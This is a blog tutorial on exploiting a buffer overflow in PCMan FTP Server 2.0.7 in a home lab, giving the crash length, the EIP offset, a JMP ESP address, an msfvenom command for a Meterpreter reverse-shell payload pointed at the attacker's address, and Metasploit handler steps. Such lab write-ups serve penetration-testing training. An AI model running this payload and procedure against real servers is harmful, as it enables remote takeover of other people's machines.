PCMan FTP Server 2.0.7 – Remote Buffer Overflow POC

Greetings! In this article I would like to present the exploitation of a vulnerable FTP server through buffer overflow. The main audience for this will be penetration testers, security analysts and security enthusiasts. I am not an expert but am sure if you follow what’s in there, it will get you going. Have fun reading it. Following will be the path we gonna cover in this article: 

  1. A little introduction 
  2. Lab setup 
  3. Steps to conduct a Buffer Overflow on PCMan FTP Server 2.0.7
  4. Practice machines 

Introduction: I expect you know these things, but let’s revise it formally once 😉 

  • PCMan FTP Server: PCMan’s FTP Server is a free software mainly designed for beginners not familiar with computer, hoping that it can make setting up a basic FTP server easy. 
  • Buffer Overflow: In the easiest terms, a buffer overflow occurs when a program tries to write too much data into the buffer. This can cause the program to crash or to execute arbitrary code. 
  • Nmap: An open-source CLI tool used in pen-testing engagements for enumeration, finding open ports, services running and their versions in general. 
  • Metasploit Framework: A famous software program for penetration testing, executing exploits and remote code execution (RCE). 
  • Msfvenom: A Metasploit tool for generating and encoding the payloads. 
  • Immunity Debugger: Immunity debugger is a binary code analysis tool developed by immunityinc. Its based on popular Olly debugger, but it enables use of python scripts to automatize repetitive jobs. 

Lab Setup: 

There could be alternatives to this lab, but this is what I have used while performing the attack. The installation of any of these is not covered in this post to avoid the extra lengthiness. Kindly ensure you have the following installed and setup before we move further into the main thing! 

Note: Install Kali Linux and Windows 7/8/8.1 on Virtual Box. In Windows 7 simulation machine install Immunity Debugger and PcMan vulnerable FTP server. 

Steps to conduct a Buffer Overflow on PCMan FTP Server 2.0.7 

Enumeration with nmap: 

First off I installed the PCman program on my Windows 7 machine from https://www.exploit db.com/exploits/26471. Start the service as an administrator. Depending on your version of Windows, you may also have to turn off the Firewall. Also start the Immunity debugger and open the FTP server in it. 

The nmap command on the target machine showed the following output: 

K:\bo\Screenshot from 2020-01-29 01-01-18.png

On double check that it was working OK, I made a quick netcat connection to it, using the command: 

nc 192.168.1.8 21 

Note:  

  • Version is PCMan’s FTP Server 2.0.7 which is vulnerable to buffer overflow attack. 
  • Windows 7 simulation machine IP is 192.168.1.8 so change it as per yours. 
  • In the OS details section, all the OS’s listed are vulnerable to the same. Therefore, you can install any of the OS among them and perform exploitation. 

Crashing the server: 

I tried to overflow the PUT buffer several times and got the closest hit at 2100 A’s as shown in the script above and its output can be seen on our simulation machine. 

C:\Users\jeevan singh\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Screenshot from 2020-01-29 01-09-39.png
  • Note how the Immunity debugger is affected and crashed the FTP server on sending this long string of A’s on the simulation machine. 
K:\bo\buffer_overflowed.PNG

Finding the offset 

Perform all the same procedure i.e 

  • Restart the Immunity debugger  
  • Open the PCman application in Immunity 

To get the exact number of inputs I used a script called pattern_create.rb in Kali as shown which would create a unique pattern of 2100 alphanumeric values.  

K:\bo\Screenshot from 2020-01-29 01-21-14.png

After replacing the A’s with the newly created pattern, our script looked like this:  

K:\bo\Screenshot from 2020-01-29 01-23-15.png

The output looks like this: 

K:\bo\searching_for_pattern.PNG

To find where this EIP is, I would use another script called pattern_offset.rb which would find the exact offset value as shown below: 

K:\bo\Screenshot from 2020-01-29 01-27-38.png

So, the offset value is 2007.  

Remake the script as shown below: 

Controlling the EIP 

Perform all the same procedure again i.e 

  • Restart the Immunity debugger  
  • Open the PCman application in Immunity 
K:\bo\Screenshot from 2020-01-29 01-31-26.png

Here we supplied exact 2007 A’s into the buffer. To check for padding, we would notice the behaviour of EIP in immunity debugger of the simulation machine (windows 7). 

K:\bo\padding_check.PNG

Notice the EIP, it is 42424242, which is “BBBB” and we have controlled it successfully. That means, now we can make the EIP jump to a specific .dll file and execute any arbitrary shellcode.  

To do so, I would use mona.py in Immunity Debugger. 

JMP ESP 

You may install it from here: 

https://github.com/corelan/mona

Extract the zip file and paste mona.py into C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands 

To perform JMP ESP command it needs to be in the form of hex, so we would use nasm shell for it as shown: 

K:\bo\Screenshot from 2020-01-29 01-37-55.png

So we got our value for JMP ESP which is “\xFF\xE4” in hex. 

Perform the following command as shown below: 

K:\bo\mona.PNG

Copy the address “76693165” and recreate the python script in kali linux as shown: 

K:\bo\Screenshot from 2020-01-29 01-55-18.png

It’s very important to notice that we need to change the copied address in the little endian format as I squared the EIP region. And the payload pcman which might have confused you is generated as shown in the next step: 

Generating the shellcode with msfvenom 

K:\bo\Screenshot from 2020-01-29 01-53-11.png

The command for your reference is: 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1377 -n 10 -f python -v pcman LPORT=1377 -e x86/shikata_ga_nai –platform windows –arch x86 -b ‘\x00\x0d\x0a\x20’ 

  • The -b parameter is used to eliminate the bad characters. That’s an easy way to do it. However, there is a complete methodology of finding and eliminating the bad characters which is not covered here. 

Enjoying the RCE 

Now, is the last step to be executed, run msfconsole, set payload as windows/meterpreter/reverse_tcp. 

use exploit/multi/handler. 

SET LHOST 192.168.1.7 

SET LPORT 1377 

exploit 

On the contrary, run poc4.py from kali. Now you don’t need to run immunity debugger and make sure the ftp server is running. 

Check if you got a reverse connection as I got here: 

K:\bo\Screenshot from 2020-01-29 02-06-09.png

In this way, the PCman ftp server 2.0.7 can be exploited by overflowing the PUT method. Hence, obtaining the RCE. 

Practice Machines: 

After you are done practicing on PcMan FTP server, you could exploit the following machines too in the same way for your practice: 

Post By Jeevan Singh Bhasin